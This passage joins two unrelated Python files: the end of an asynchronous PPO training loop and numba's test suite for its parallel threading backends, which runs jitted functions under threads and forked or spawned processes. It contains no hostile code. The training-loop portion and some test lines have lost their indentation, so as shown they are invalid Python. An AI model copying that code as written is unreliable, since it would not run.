                                    self.stats_queue.put(["charts/episode_reward", info['episode']['r']])
                                if local_step % 1000 == 0:
                                    print(stopwatch.format_report(sw.get_last_aggregated_report()))
                                    print()
env_fns = [make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)]
async_envs = AsyncEnvs(env_fns, args.num_rollout_workers, args.num_steps, device, agent,
[next_obs, next_done, obs, actions, logprobs, rewards, dones, values])
# raise
start_time = time.time()
sw = stopwatch.StopWatch()
min_num_requests = 1
wait_for_min_requests = 0.01
# raise
for update in range(1, num_updates+1):
# Annealing the rate if instructed to do so.
if args.anneal_lr:
frac = 1.0 - (update - 1.0) / num_updates
lrnow = lr(frac)
optimizer.param_groups[0]['lr'] = lrnow
# TRY NOT TO MODIFY: prepare the execution of the game.
end_policy_requests = []
with sw.timer('main'):
with sw.timer('rollouts_inference'):
while True:
with sw.timer('stats_queue'):
try:
if async_envs.stats_queue.qsize() != 0:
ms = async_envs.stats_queue.get_many()
for m1, m2 in ms:
# m1, m2 = async_envs.stats_queue.get_many(timeout=0.005)
if m1 == 'l':
global_step += m2
else:
print(f"global_step={global_step}, episode_reward={m2}")
writer.add_scalar(m1, m2, global_step)
except:
pass
with sw.timer('get_policy_requests'):
policy_requests = []
if async_envs.policy_request_queue.qsize() != 0:
temp_policy_requests = async_envs.policy_request_queue.get_many()
for policy_request in temp_policy_requests:
next_step = policy_request[0] = policy_request[0] % args.num_steps
if next_step == 0:
end_policy_requests += [policy_request]
else:
policy_requests += [policy_request]
if len(end_policy_requests) == args.num_envs:
break
with sw.timer('get_actions'):
if len(policy_requests) > 0:
with sw.timer('index'):
ls = np.array(policy_requests)
with sw.timer('move_to_gpu_for_inference'):
next_o = torch.tensor(next_obs[ls[:,1]]).pin_memory().to(device, non_blocking=True)
with sw.timer('actual inference'):
with torch.no_grad():
a, l, _ = agent.get_action(next_o)
v = agent.get_value(next_o)
with sw.timer('to cpu and deligate rollout tasks'):
actions[tuple(ls[:,[0,1]].T)] = a.cpu()
logprobs[tuple(ls[:,[0,1]].T)] = l.cpu()
values[tuple(ls[:,[0,1]].T)] = v.flatten().cpu()
for item in ls:
async_envs.rollout_task_queues[item[2]].put([item[0], item[1]])
with sw.timer('move to gpu'):
# bootstrap reward if not done. reached the batch limit
gpu_obs = torch.tensor(obs).pin_memory().to(device, non_blocking=True)
gpu_actions = torch.tensor(actions).pin_memory().to(device, non_blocking=True)
gpu_logprobs = torch.tensor(logprobs).pin_memory().to(device, non_blocking=True)
gpu_rewards = torch.tensor(rewards).pin_memory().to(device, non_blocking=True)
gpu_dones = torch.tensor(dones).pin_memory().to(device, non_blocking=True)
gpu_values = torch.tensor(values).pin_memory().to(device, non_blocking=True)
gpu_next_obs = torch.tensor(next_obs).pin_memory().to(device, non_blocking=True)
gpu_next_done = torch.tensor(next_done).pin_memory().to(device, non_blocking=True)
with sw.timer('learn'):
with torch.no_grad():
last_value = agent.get_value(gpu_next_obs).reshape(1, -1)
if args.gae:
advantages = torch.zeros_like(gpu_rewards).to(device)
lastgaelam = 0
for t in reversed(range(args.num_steps)):
if t == args.num_steps - 1:
nextnonterminal = 1.0 - gpu_next_done
nextvalues = last_value
else:
nextnonterminal = 1.0 - gpu_dones[t+1]
nextvalues = gpu_values[t+1]
delta = gpu_rewards[t] + args.gamma * nextvalues * nextnonterminal - gpu_values[t]
advantages[t] = lastgaelam = delta + args.gamma * args.gae_lambda * nextnonterminal * lastgaelam
returns = advantages + gpu_values
else:
returns = torch.zeros_like(gpu_rewards).to(device)
for t in reversed(range(args.num_steps)):
if t == args.num_steps - 1:
nextnonterminal = 1.0 - gpu_next_done
next_return = last_value
else:
nextnonterminal = 1.0 - gpu_dones[t+1]
next_return = returns[t+1]
returns[t] = gpu_rewards[t] + args.gamma * nextnonterminal * next_return
advantages = returns - gpu_values
# flatten the batch
b_obs = gpu_obs.reshape((-1,)+envs.observation_space.shape)
b_logprobs = gpu_logprobs.reshape(-1)
b_actions = gpu_actions.reshape((-1,)+envs.action_space.shape)
b_advantages = advantages.reshape(-1)
b_returns = returns.reshape(-1)
b_values = gpu_values.reshape(-1)
# Optimizaing the policy and value network
target_agent = Agent(envs).to(device)
inds = np.arange(args.batch_size,)
for i_epoch_pi in range(args.update_epochs):
np.random.shuffle(inds)
target_agent.load_state_dict(agent.state_dict())
for start in range(0, args.batch_size, args.minibatch_size):
end = start + args.minibatch_size
minibatch_ind = inds[start:end]
mb_advantages = b_advantages[minibatch_ind]
if args.norm_adv:
mb_advantages = (mb_advantages - mb_advantages.mean()) / (mb_advantages.std() + 1e-8)
_, newlogproba, entropy = agent.get_action(b_obs[minibatch_ind], b_actions.long()[minibatch_ind])
ratio = (newlogproba - b_logprobs[minibatch_ind]).exp()
# Stats
approx_kl = (b_logprobs[minibatch_ind] - newlogproba).mean()
# Policy loss
pg_loss1 = -mb_advantages * ratio
pg_loss2 = -mb_advantages * torch.clamp(ratio, 1-args.clip_coef, 1+args.clip_coef)
pg_loss = torch.max(pg_loss1, pg_loss2).mean()
entropy_loss = entropy.mean()
# Value loss
new_values = agent.get_value(b_obs[minibatch_ind]).view(-1)
if args.clip_vloss:
v_loss_unclipped = ((new_values - b_returns[minibatch_ind]) ** 2)
v_clipped = b_values[minibatch_ind] + torch.clamp(new_values - b_values[minibatch_ind], -args.clip_coef, args.clip_coef)
v_loss_clipped = (v_clipped - b_returns[minibatch_ind])**2
v_loss_max = torch.max(v_loss_unclipped, v_loss_clipped)
v_loss = 0.5 * v_loss_max.mean()
else:
v_loss = 0.5 * ((new_values - b_returns[minibatch_ind]) ** 2).mean()
loss = pg_loss - args.ent_coef * entropy_loss + v_loss * args.vf_coef
optimizer.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(agent.parameters(), args.max_grad_norm)
optimizer.step()
if args.kle_stop:
if approx_kl > args.target_kl:
break
if args.kle_rollback:
if (b_logprobs[minibatch_ind] - agent.get_action(b_obs[minibatch_ind], b_actions.long()[minibatch_ind])[1]).mean() > args.target_kl:
agent.load_state_dict(target_agent.state_dict())
break
# TRY NOT TO MODIFY: record rewards for plotting purposes
writer.add_scalar("charts/learning_rate", optimizer.param_groups[0]['lr'], global_step)
writer.add_scalar("losses/value_loss", v_loss.item(), global_step)
writer.add_scalar("losses/policy_loss", pg_loss.item(), global_step)
writer.add_scalar("losses/entropy", entropy.mean().item(), global_step)
writer.add_scalar("losses/approx_kl", approx_kl.item(), global_step)
if args.kle_stop or args.kle_rollback:
writer.add_scalar("debug/pg_stop_iter", i_epoch_pi, global_step)
# continue
print('restart')
print("SPS:", int(global_step / (time.time() - start_time)))
# raise
ls = np.array(end_policy_requests)
next_o = torch.tensor(next_obs[ls[:,1]]).pin_memory().to(device, non_blocking=True)
with torch.no_grad():
a, l, _ = agent.get_action(next_o)
v = agent.get_value(next_o)
actions[tuple(ls[:,[0,1]].T)] = a.cpu()
logprobs[tuple(ls[:,[0,1]].T)] = l.cpu()
values[tuple(ls[:,[0,1]].T)] = v.flatten().cpu()
for item in ls:
async_envs.rollout_task_queues[item[2]].put([item[0], item[1]])
print(stopwatch.format_report(sw.get_last_aggregated_report()))
envs.close()
writer.close()
|
test_parallel_backend.py | # -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import
"""
Tests the parallel backend
"""
import threading
import multiprocessing
import random
import os
import sys
import subprocess
import numpy as np
from numba import config, utils
from numba import unittest_support as unittest
from numba import jit, vectorize, guvectorize
from .support import temp_directory, override_config, TestCase, tag
from .test_parfors import skip_unsupported as parfors_skip_unsupported
from .test_parfors import linux_only
from numba.six.moves import queue as t_queue
from numba.testing.main import _TIMEOUT as _RUNNER_TIMEOUT
_TEST_TIMEOUT = _RUNNER_TIMEOUT - 60.
if utils.PYVERSION >= (3, 0):
import faulthandler
# Check which backends are available
# TODO: Put this in a subprocess so the address space is kept clean
try:
from numba.npyufunc import tbbpool # noqa: F401
_HAVE_TBB_POOL = True
except ImportError:
_HAVE_TBB_POOL = False
try:
from numba.npyufunc import omppool
_HAVE_OMP_POOL = True
except ImportError:
_HAVE_OMP_POOL = False
try:
import scipy.linalg.cython_lapack # noqa: F401
_HAVE_LAPACK = True
except ImportError:
_HAVE_LAPACK = False
# test skipping decorators
skip_no_omp = unittest.skipUnless(_HAVE_OMP_POOL, "OpenMP threadpool required")
skip_no_tbb = unittest.skipUnless(_HAVE_TBB_POOL, "TBB threadpool required")
_gnuomp = _HAVE_OMP_POOL and omppool.openmp_vendor == "GNU"
skip_unless_gnu_omp = unittest.skipUnless(_gnuomp, "GNU OpenMP only tests")
skip_unless_py3 = unittest.skipUnless(utils.PYVERSION >= (3, 0),
"Test runs on Python 3 only")
_windows = sys.platform.startswith('win')
_osx = sys.platform.startswith('darwin')
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_parfors_unsupported = _32bit or _windows_py27
_HAVE_OS_FORK = not _windows
# some functions to jit
def foo(n, v):
    """Return a length-``n`` float array of ones with ``v`` added elementwise."""
    ones = np.ones(n)
    return ones + v
# Define `linalg` according to LAPACK availability: the real version performs a
# matrix product so an MKL/LAPACK-backed BLAS path is exercised; the fallback
# does elementwise work only.
if _HAVE_LAPACK:
    def linalg(n, v):
        """Do an (n, n) matrix product plus elementwise adds to exercise BLAS."""
        x = np.dot(np.ones((n, n)), np.ones((n, n)))
        return x + np.arange(n) + v
else:
    def linalg(n, v):
        """Elementwise-only fallback when scipy's LAPACK bindings are absent."""
        # no way to trigger MKL without the lapack bindings.
        return np.arange(n) + v
def ufunc_foo(a, b):
    """Elementwise sum of ``a`` and ``b`` (vectorize target)."""
    total = a + b
    return total
def gufunc_foo(a, b, out):
    """Write ``a + b`` into ``out[0]`` (guvectorize '(),()->()' kernel)."""
    total = a + b
    out[0] = total
class runnable(object):
    """Base for callable test runners; stores decorator keyword options."""

    def __init__(self, **options):
        # Keyword options forwarded to jit/vectorize/guvectorize by subclasses.
        self._options = options
class jit_runner(runnable):
    """Compile ``foo`` with @jit and check it against the pure-Python result."""

    def __call__(self):
        compiled = jit(**self._options)(foo)
        n, v = 4, 10
        reference = foo(n, v)
        result = compiled(n, v)
        np.testing.assert_allclose(reference, result)
class linalg_runner(runnable):
    """Compile ``linalg`` with @jit and check against the pure-Python result."""

    def __call__(self):
        compiled = jit(**self._options)(linalg)
        n, v = 4, 10
        reference = linalg(n, v)
        result = compiled(n, v)
        np.testing.assert_allclose(reference, result)
class vectorize_runner(runnable):
    """Compile ``ufunc_foo`` with @vectorize and compare to the Python result."""

    def __call__(self):
        compiled = vectorize(['(f4, f4)'], **self._options)(ufunc_foo)
        data = np.random.random(10).astype(np.float32)
        reference = ufunc_foo(data, data)
        result = compiled(data, data)
        np.testing.assert_allclose(reference, result)
class guvectorize_runner(runnable):
    """Compile ``gufunc_foo`` with @guvectorize; the scalar kernel computes
    a + b per element, so the expected output comes from ``ufunc_foo``."""

    def __call__(self):
        signature = ['(f4, f4, f4[:])']
        compiled = guvectorize(signature, '(),()->()', **self._options)(gufunc_foo)
        data = np.random.random(10).astype(np.float32)
        reference = ufunc_foo(data, data)
        result = compiled(data, data)
        np.testing.assert_allclose(reference, result)
def chooser(fnlist, **kwargs):
    """Worker body: run randomly chosen entries from ``fnlist`` repeatedly.

    Any exception raised is put on the queue passed via the ``queue`` keyword
    so the parent thread/process can collect and report it.
    """
    q = kwargs.get('queue')
    try:
        if utils.PYVERSION >= (3, 0):
            # Dump tracebacks on hard crashes (segfault/abort) for debugging.
            faulthandler.enable()
        # 1.5x the list length so some functions are exercised more than once.
        for _ in range(int(len(fnlist) * 1.5)):
            fn = random.choice(fnlist)
            fn()
    except Exception as e:
        q.put(e)
def compile_factory(parallel_class, queue_impl):
    """Build a runner that exercises ``fnlist`` on four concurrent workers.

    ``parallel_class`` is a Thread/Process-like factory and ``queue_impl`` a
    matching queue class used to collect worker exceptions.
    """
    def run_compile(fnlist):
        err_queue = queue_impl()
        workers = [
            parallel_class(target=chooser, args=(fnlist,),
                           kwargs={'queue': err_queue})
            for _ in range(4)
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
        # Re-raise any exceptions the workers pushed onto the queue.
        if not err_queue.empty():
            collected = []
            while not err_queue.empty():
                collected.append(err_queue.get(False))
            joined = '\n'.join(repr(item) for item in collected)
            raise RuntimeError(
                "Error(s) occurred in delegated runner:\n%s" % joined)
    return run_compile
# workers
# Thread worker class used by the threading-based runner.
_thread_class = threading.Thread


class _proc_class_impl(object):
    """Factory producing multiprocessing ``Process`` objects.

    On Python 2 there are no start-method contexts, so the plain
    ``multiprocessing.Process`` is used; on Python 3 a context for the
    requested start method ('spawn', 'fork', 'forkserver' or None for the
    platform default) supplies the Process class.
    """

    def __init__(self, method):
        self._method = method

    def __call__(self, *args, **kwargs):
        if utils.PYVERSION < (3, 0):
            return multiprocessing.Process(*args, **kwargs)
        else:
            ctx = multiprocessing.get_context(self._method)
            return ctx.Process(*args, **kwargs)
def _get_mp_classes(method):
    """Return ``(process_factory, queue_class)`` for a given start method.

    ``method`` may be 'default' (mapped to None, i.e. the platform default),
    'spawn', 'fork' or 'forkserver'. On Python 2 there are no contexts, so
    the plain multiprocessing Queue is used.
    """
    if utils.PYVERSION < (3, 0):
        proc = _proc_class_impl(method)
        queue = multiprocessing.Queue
    else:
        if method == 'default':
            method = None
        ctx = multiprocessing.get_context(method)
        proc = _proc_class_impl(method)
        queue = ctx.Queue
    return proc, queue
# Concrete runners, one per concurrency flavour.
thread_impl = compile_factory(_thread_class, t_queue.Queue)
spawn_proc_impl = compile_factory(*_get_mp_classes('spawn'))
if not _windows:
    # fork-based start methods are unavailable on Windows
    fork_proc_impl = compile_factory(*_get_mp_classes('fork'))
    forkserver_proc_impl = compile_factory(*_get_mp_classes('forkserver'))

# this is duplication as Py27, linux uses fork, windows uses spawn, it however
# is kept like this so that when tests fail it's less confusing!
default_proc_impl = compile_factory(*_get_mp_classes('default'))
class TestParallelBackendBase(TestCase):
    """
    Base class for testing the parallel backends
    """

    # Runners covering every compilation flavour; parfors variants are added
    # below when the platform supports them.
    all_impls = [
        jit_runner(nopython=True),
        jit_runner(nopython=True, cache=True),
        jit_runner(nopython=True, nogil=True),
        linalg_runner(nopython=True),
        linalg_runner(nopython=True, nogil=True),
        vectorize_runner(nopython=True),
        vectorize_runner(nopython=True, target='parallel'),
        vectorize_runner(nopython=True, target='parallel', cache=True),
        guvectorize_runner(nopython=True),
        guvectorize_runner(nopython=True, target='parallel'),
        guvectorize_runner(nopython=True, target='parallel', cache=True),
    ]

    if not _parfors_unsupported:
        parfor_impls = [
            jit_runner(nopython=True, parallel=True),
            jit_runner(nopython=True, parallel=True, cache=True),
            linalg_runner(nopython=True, parallel=True),
            linalg_runner(nopython=True, parallel=True, cache=True),
        ]
        all_impls.extend(parfor_impls)

    # Concurrency mechanisms the runners are driven under.
    parallelism = ['threading', 'random']
    if utils.PYVERSION > (3, 0):
        parallelism.append('multiprocessing_spawn')
        if _HAVE_OS_FORK:
            parallelism.append('multiprocessing_fork')
            parallelism.append('multiprocessing_forkserver')
    else:
        parallelism.append('multiprocessing_default')

    # Named groups of runners; test methods are generated per (parallelism,
    # group) pair. FIX: the vectorize group key was misspelled
    # 'concurrect_vectorize', which leaked into generated test names.
    runners = {
        'concurrent_jit': [
            jit_runner(nopython=True, parallel=(not _parfors_unsupported)),
        ],
        'concurrent_vectorize': [
            vectorize_runner(nopython=True, target='parallel'),
        ],
        'concurrent_guvectorize': [
            guvectorize_runner(nopython=True, target='parallel'),
        ],
        'concurrent_mix_use': all_impls,
    }

    safe_backends = {'omp', 'tbb'}

    def run_compile(self, fnlist, parallelism='threading'):
        """Run ``fnlist`` under the requested concurrency mechanism inside a
        fresh temporary cache directory (so ``cache=True`` runners do not
        collide across tests)."""
        self._cache_dir = temp_directory(self.__class__.__name__)
        with override_config('CACHE_DIR', self._cache_dir):
            if parallelism == 'threading':
                thread_impl(fnlist)
            elif parallelism == 'multiprocessing_fork':
                fork_proc_impl(fnlist)
            elif parallelism == 'multiprocessing_forkserver':
                forkserver_proc_impl(fnlist)
            elif parallelism == 'multiprocessing_spawn':
                spawn_proc_impl(fnlist)
            elif parallelism == 'multiprocessing_default':
                default_proc_impl(fnlist)
            elif parallelism == 'random':
                # Run every applicable mechanism in a shuffled order.
                if utils.PYVERSION < (3, 0):
                    ps = [thread_impl, default_proc_impl]
                else:
                    ps = [thread_impl, spawn_proc_impl]
                    if _HAVE_OS_FORK:
                        ps.append(fork_proc_impl)
                        ps.append(forkserver_proc_impl)
                random.shuffle(ps)
                for impl in ps:
                    impl(fnlist)
            else:
                raise ValueError(
                    'Unknown parallelism supplied %s' % parallelism)
# Only run these tests when a threading layer was explicitly selected, so a
# known backend is the one being tortured.
_specific_backends = config.THREADING_LAYER in ('omp', 'tbb', 'workqueue')


@unittest.skipUnless(_specific_backends, "Threading layer not explicit")
class TestParallelBackend(TestParallelBackendBase):
    """ These are like the numba.tests.test_threadsafety tests but designed
    instead to torture the parallel backend.

    If a suitable backend is supplied via NUMBA_THREADING_LAYER these tests
    can be run directly. This test class cannot be run using the multiprocessing
    option to the test runner (i.e. `./runtests -m`) as daemon processes cannot
    have children.
    """

    # NOTE: All tests are generated based on what a platform supports concurrent
    # execution wise from Python, irrespective of whether the native libraries
    # can actually handle the behaviour present.
    @classmethod
    def generate(cls):
        """Create one test method per (parallelism, runner-group) pair."""
        for p in cls.parallelism:
            for name, impl in cls.runners.items():
                methname = "test_" + p + '_' + name

                # Closure factory so each generated test binds its own
                # (impl, p) rather than the loop variables.
                def methgen(impl, p):
                    def test_method(self):
                        selfproc = multiprocessing.current_process()
                        # daemonized processes cannot have children
                        if selfproc.daemon:
                            _msg = 'daemonized processes cannot have children'
                            self.skipTest(_msg)
                        else:
                            self.run_compile(impl, parallelism=p)
                    return test_method
                fn = methgen(impl, p)
                fn.__name__ = methname
                setattr(cls, methname, fn)


TestParallelBackend.generate()
class TestSpecificBackend(TestParallelBackendBase):
    """
    This is quite contrived, for each test in the TestParallelBackend tests it
    generates a test that will run the TestParallelBackend test in a new python
    process with an environment modified to ensure a specific threadsafe backend
    is used. This is with view of testing the backends independently and in an
    isolated manner such that if they hang/crash/have issues, it doesn't kill
    the test suite.
    """
    _DEBUG = False

    # Guard per backend: tbb/omp only when the pool import succeeded,
    # workqueue is always built.
    backends = {'tbb': skip_no_tbb,
                'omp': skip_no_omp,
                'workqueue': unittest.skipIf(False, '')}

    def run_cmd(self, cmdline, env):
        """Run ``cmdline`` with environment ``env``.

        The child is killed after _TEST_TIMEOUT seconds. Raises AssertionError
        on a non-zero exit code; returns decoded (stdout, stderr).
        """
        popen = subprocess.Popen(cmdline,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 env=env)
        # finish in _TEST_TIMEOUT seconds or kill it
        timeout = threading.Timer(_TEST_TIMEOUT, popen.kill)
        try:
            timeout.start()
            out, err = popen.communicate()
            if popen.returncode != 0:
                raise AssertionError(
                    "process failed with code %s: stderr follows\n%s\n" %
                    (popen.returncode, err.decode()))
            return out.decode(), err.decode()
        finally:
            timeout.cancel()
        # FIX: removed an unreachable ``return None, None`` that followed the
        # try/finally — every path through the ``try`` returns or raises.

    def run_test_in_separate_process(self, test, threading_layer):
        """Run the named test in a child interpreter pinned to a layer."""
        env_copy = os.environ.copy()
        env_copy['NUMBA_THREADING_LAYER'] = str(threading_layer)
        cmdline = [sys.executable, "-m", "numba.runtests", test]
        return self.run_cmd(cmdline, env_copy)

    @classmethod
    def _inject(cls, p, name, backend, backend_guard):
        """Attach a test running a TestParallelBackend method in a child
        process with NUMBA_THREADING_LAYER forced to ``backend``."""
        themod = cls.__module__
        thecls = TestParallelBackend.__name__
        methname = "test_" + p + '_' + name
        injected_method = '%s.%s.%s' % (themod, thecls, methname)

        def test_template(self):
            o, e = self.run_test_in_separate_process(injected_method, backend)
            if self._DEBUG:
                print('stdout:\n "%s"\n stderr:\n "%s"' % (o, e))
            # unittest reports its status on stderr
            self.assertIn('OK', e)
            self.assertTrue('FAIL' not in e)
            self.assertTrue('ERROR' not in e)
        injected_test = "test_%s_%s_%s" % (p, name, backend)
        # Mark as long_running
        setattr(cls, injected_test,
                tag('long_running')(backend_guard(test_template)))

    @classmethod
    def generate(cls):
        """Create tests for each (backend, parallelism, runner-group) triple,
        skipping combinations known to be invalid."""
        for backend, backend_guard in cls.backends.items():
            for p in cls.parallelism:
                for name in cls.runners.keys():
                    # handle known problem cases...

                    # GNU OpenMP is not fork safe
                    if (p in ('multiprocessing_fork', 'random') and
                            backend == 'omp' and
                            sys.platform.startswith('linux')):
                        continue

                    # workqueue is not thread safe
                    if (p in ('threading', 'random') and
                            backend == 'workqueue'):
                        continue

                    cls._inject(p, name, backend, backend_guard)


TestSpecificBackend.generate()
class ThreadLayerTestHelper(TestCase):
    """
    Helper class for running an isolated piece of code based on a template
    """
    # sys path injection and separate usecase module to make sure everything
    # is importable by children of multiprocessing
    _here = "%r" % os.path.dirname(__file__)

    # Child-process source template; the test body is interpolated into
    # ``the_test`` via the escaped ``%%s`` placeholder.
    template = """if 1:
        import sys
        sys.path.insert(0, "%(here)r")
        import multiprocessing
        import numpy as np
        from numba import njit
        import numba
        try:
            import threading_backend_usecases
        except ImportError as e:
            print("DEBUG:", sys.path)
            raise e
        import os

        sigterm_handler = threading_backend_usecases.sigterm_handler
        busy_func = threading_backend_usecases.busy_func

        def the_test():
            %%s

        if __name__ == "__main__":
            the_test()
    """ % {'here': _here}

    def run_cmd(self, cmdline, env=None):
        """Run ``cmdline``; by default force the 'omp' threading layer.

        The child is killed after _TEST_TIMEOUT seconds. Raises AssertionError
        on a non-zero exit code; returns decoded (stdout, stderr).
        """
        if env is None:
            env = os.environ.copy()
            env['NUMBA_THREADING_LAYER'] = str("omp")
        popen = subprocess.Popen(cmdline,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 env=env)
        # finish in _TEST_TIMEOUT seconds or kill it
        timeout = threading.Timer(_TEST_TIMEOUT, popen.kill)
        try:
            timeout.start()
            out, err = popen.communicate()
            if popen.returncode != 0:
                raise AssertionError(
                    "process failed with code %s: stderr follows\n%s\n" %
                    (popen.returncode, err.decode()))
        finally:
            timeout.cancel()
        return out.decode(), err.decode()
@parfors_skip_unsupported
class TestThreadingLayerSelection(ThreadLayerTestHelper):
    """
    Checks that numba.threading_layer() reports correctly.
    """
    _DEBUG = False

    backends = {'tbb': skip_no_tbb,
                'omp': skip_no_omp,
                'workqueue': unittest.skipIf(False, '')}

    @classmethod
    def _inject(cls, backend, backend_guard):
        """Attach a test asserting the child process selects ``backend``."""
        def test_template(self):
            body = """if 1:
                X = np.arange(1000000.)
                Y = np.arange(1000000.)
                Z = busy_func(X, Y)
                assert numba.threading_layer() == '%s'
            """
            runme = self.template % (body % backend)
            cmdline = [sys.executable, '-c', runme]
            env = os.environ.copy()
            env['NUMBA_THREADING_LAYER'] = str(backend)
            out, err = self.run_cmd(cmdline, env=env)
            if self._DEBUG:
                print(out, err)
        injected_test = "test_threading_layer_selector_%s" % backend
        setattr(cls, injected_test,
                tag("important")(backend_guard(test_template)))

    @classmethod
    def generate(cls):
        """Create one layer-selection test per backend."""
        for backend, backend_guard in cls.backends.items():
            cls._inject(backend, backend_guard)


TestThreadingLayerSelection.generate()
@parfors_skip_unsupported
@skip_unless_py3
class TestMiscBackendIssues(ThreadLayerTestHelper):
    """
    Checks fixes for the issues with threading backends implementation
    """
    _DEBUG = False

    @skip_no_omp
    def test_omp_stack_overflow(self):
        """
        Tests that OMP does not overflow stack
        """
        runme = """if 1:
            from numba import vectorize, threading_layer
            import numpy as np

            @vectorize(['f4(f4,f4,f4,f4,f4,f4,f4,f4)'], target='parallel')
            def foo(a, b, c, d, e, f, g, h):
                return a+b+c+d+e+f+g+h

            x = np.ones(2**20, np.float32)
            foo(*([x]*8))

            print("@%s@" % threading_layer())
        """
        cmdline = [sys.executable, '-c', runme]
        env = os.environ.copy()
        env['NUMBA_THREADING_LAYER'] = "omp"
        # Deliberately tiny per-thread stacks to provoke a crash if the
        # backend keeps large data on the stack.
        env['OMP_STACKSIZE'] = "100K"
        out, err = self.run_cmd(cmdline, env=env)
        if self._DEBUG:
            print(out, err)
        self.assertIn("@omp@", out)

    @skip_no_tbb
    def test_single_thread_tbb(self):
        """
        Tests that TBB works well with single thread
        https://github.com/numba/numba/issues/3440
        """
        runme = """if 1:
            from numba import njit, prange, threading_layer

            @njit(parallel=True)
            def foo(n):
                acc = 0
                for i in prange(n):
                    acc += i
                return acc

            foo(100)

            print("@%s@" % threading_layer())
        """
        cmdline = [sys.executable, '-c', runme]
        env = os.environ.copy()
        env['NUMBA_THREADING_LAYER'] = "tbb"
        env['NUMBA_NUM_THREADS'] = "1"
        out, err = self.run_cmd(cmdline, env=env)
        if self._DEBUG:
            print(out, err)
        self.assertIn("@tbb@", out)
# 32bit or windows py27 (not that this runs on windows)
@parfors_skip_unsupported
@skip_unless_gnu_omp
class TestForkSafetyIssues(ThreadLayerTestHelper):
    """
    Checks Numba's behaviour in various situations involving GNU OpenMP and fork
    """
    _DEBUG = False

    def test_check_threading_layer_is_gnu(self):
        """Sanity check: these tests only make sense against GNU OpenMP."""
        runme = """if 1:
            from numba.npyufunc import omppool
            assert omppool.openmp_vendor == 'GNU'
        """
        cmdline = [sys.executable, '-c', runme]
        out, err = self.run_cmd(cmdline)

    def test_par_parent_os_fork_par_child(self):
        """
        Whilst normally valid, this actually isn't for Numba invariant of OpenMP
        Checks SIGABRT is received.
        """
        body = """if 1:
            X = np.arange(1000000.)
            Y = np.arange(1000000.)
            Z = busy_func(X, Y)
            pid = os.fork()
            if pid == 0:
                Z = busy_func(X, Y)
            else:
                os.wait()
        """
        runme = self.template % body
        cmdline = [sys.executable, '-c', runme]
        try:
            out, err = self.run_cmd(cmdline)
        except AssertionError as e:
            # -6 is SIGABRT from the GNU OpenMP runtime on illegal fork use.
            self.assertIn("failed with code -6", str(e))

    def test_par_parent_implicit_mp_fork_par_child(self):
        """
        Implicit use of multiprocessing fork context.
        Does this:
        1. Start with OpenMP
        2. Fork to processes using OpenMP (this is invalid)
        3. Joins fork
        4. Check the exception pushed onto the queue that is a result of
           catching SIGTERM coming from the C++ aborting on illegal fork
           pattern for GNU OpenMP
        """
        body = """if 1:
            X = np.arange(1000000.)
            Y = np.arange(1000000.)
            q = multiprocessing.Queue()

            # Start OpenMP runtime on parent via parallel function
            Z = busy_func(X, Y, q)

            # fork() underneath with no exec, will abort
            proc = multiprocessing.Process(target = busy_func, args=(X, Y, q))
            proc.start()

            err = q.get()
            assert "Caught SIGTERM" in str(err)
        """
        runme = self.template % body
        cmdline = [sys.executable, '-c', runme]
        out, err = self.run_cmd(cmdline)
        if self._DEBUG:
            print(out, err)

    @linux_only
    @skip_unless_py3
    def test_par_parent_explicit_mp_fork_par_child(self):
        """
        Explicit use of multiprocessing fork context.
        Does this:
        1. Start with OpenMP
        2. Fork to processes using OpenMP (this is invalid)
        3. Joins fork
        4. Check the exception pushed onto the queue that is a result of
           catching SIGTERM coming from the C++ aborting on illegal fork
           pattern for GNU OpenMP
        """
        body = """if 1:
            X = np.arange(1000000.)
            Y = np.arange(1000000.)
            q = multiprocessing.Queue()

            # Start OpenMP runtime on parent via parallel function
            Z = busy_func(X, Y, q)

            # fork() underneath with no exec, will abort
            ctx = multiprocessing.get_context('fork')
            proc = ctx.Process(target = busy_func, args=(X, Y, q))
            proc.start()
            proc.join()

            err = q.get()
            assert "Caught SIGTERM" in str(err)
        """
        runme = self.template % body
        cmdline = [sys.executable, '-c', runme]
        out, err = self.run_cmd(cmdline)
        if self._DEBUG:
            print(out, err)

    @skip_unless_py3
    def test_par_parent_mp_spawn_par_child_par_parent(self):
        """
        Explicit use of multiprocessing spawn, this is safe.
        Does this:
        1. Start with OpenMP
        2. Spawn to processes using OpenMP
        3. Join spawns
        4. Run some more OpenMP
        """
        body = """if 1:
            X = np.arange(1000000.)
            Y = np.arange(1000000.)
            q = multiprocessing.Queue()

            # Start OpenMP runtime and run on parent via parallel function
            Z = busy_func(X, Y, q)
            procs = []
            ctx = multiprocessing.get_context('spawn')
            for x in range(20): # start a lot to try and get overlap
                ## fork() + exec() to run some OpenMP on children
                proc = ctx.Process(target = busy_func, args=(X, Y, q))
                procs.append(proc)
                sys.stdout.flush()
                sys.stderr.flush()
                proc.start()

            [p.join() for p in procs]

            try:
                q.get(False)
            except multiprocessing.queues.Empty:
                pass
            else:
                raise RuntimeError("Queue was not empty")

            # Run some more OpenMP on parent
            Z = busy_func(X, Y, q)
        """
        runme = self.template % body
        cmdline = [sys.executable, '-c', runme]
        out, err = self.run_cmd(cmdline)
        if self._DEBUG:
            print(out, err)

    def test_serial_parent_implicit_mp_fork_par_child_then_par_parent(self):
        """
        Implicit use of multiprocessing (will be fork, but cannot declare that
        in Py2.7 as there's no process launch context).
        Does this:
        1. Start with no OpenMP
        2. Fork to processes using OpenMP
        3. Join forks
        4. Run some OpenMP
        """
        body = """if 1:
            X = np.arange(1000000.)
            Y = np.arange(1000000.)
            q = multiprocessing.Queue()

            # this is ok
            procs = []
            for x in range(10):
                # fork() underneath with but no OpenMP in parent, this is ok
                proc = multiprocessing.Process(target = busy_func,
                                               args=(X, Y, q))
                procs.append(proc)
                proc.start()

            [p.join() for p in procs]

            # and this is still ok as the OpenMP happened in forks
            Z = busy_func(X, Y, q)

            try:
                q.get(False)
            except multiprocessing.queues.Empty:
                pass
            else:
                raise RuntimeError("Queue was not empty")
        """
        runme = self.template % body
        cmdline = [sys.executable, '-c', runme]
        out, err = self.run_cmd(cmdline)
        if self._DEBUG:
